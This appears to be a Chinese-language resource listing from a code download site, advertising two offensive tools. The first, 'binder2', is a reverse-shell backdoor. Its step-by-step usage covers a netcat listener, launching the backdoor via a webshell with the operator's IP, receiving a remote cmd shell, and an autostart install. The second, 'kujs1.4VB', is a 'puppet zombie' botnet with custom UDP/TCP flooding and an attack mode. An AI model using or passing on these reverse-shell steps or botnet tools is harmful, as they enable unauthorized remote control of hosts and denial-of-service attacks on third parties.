搜索资源列表
binder2
- 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参
kujs1.4VB
- 集成了傀儡僵尸1.5版的所有功能,增加了自定义UDP和自定义TCP数据包功能,加强了PK攻击模式。原版服务端没做免杀,优化上线速度,去后门地址。-Zombie puppet integrated all the features of version 1.5, an increase of custom and custom TCP UDP packet functions, strengthening the PK attack mode. The original did not do to